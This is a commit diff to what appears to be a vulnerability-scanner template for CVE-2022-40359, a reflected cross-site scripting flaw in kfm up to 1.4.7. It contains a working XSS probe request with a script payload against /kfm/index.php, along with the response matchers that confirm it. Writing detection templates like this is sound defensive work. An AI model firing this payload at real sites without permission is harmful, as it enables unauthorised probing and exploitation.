update CVE-2022-40359

2022-10-04 19:05:30 +02:00 · 2022-10-04 19:05:30 +02:00 · 5f5085bea9
parent 16bb08ba3d
commit 5f5085bea9
1 changed files with 7 additions and 4 deletions
--- a/cves/2022/CVE-2022-40359.yaml
+++ b/cves/2022/CVE-2022-40359.yaml
@ -1,8 +1,8 @@
 id: CVE-2022-40359

 info:
-  name: kfm 1.4.7 - Cross Site Scripting
-  author: edoardottt
+  name: kfm <= 1.4.7 - Reflected Cross-Site Scripting
+  author: edoardottt,daffainfo
  severity: medium
  description: |
    Cross site scripting (XSS) vulnerability in kfm through 1.4.7 via crafted GET request to /kfm/index.php.
@ -17,7 +17,7 @@ requests:
  - raw:
      - |
        @timeout: 10s
-        GET /kfm/index.php/'%3Cscript%3Ealert(document.domain);%3C/script%3E HTTP/1.1
+        GET /kfm/index.php/'<script>alert(document.domain);</script> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
@ -34,4 +34,7 @@ requests:
      - type: word
        part: body
        words:
-          - "<script>alert(document.domain);</script>"
+          - "<script>alert(document.domain);</script>"
+          - "x_kfm_changeCaption"
+          - "kfm_copyFiles"
+        condition: and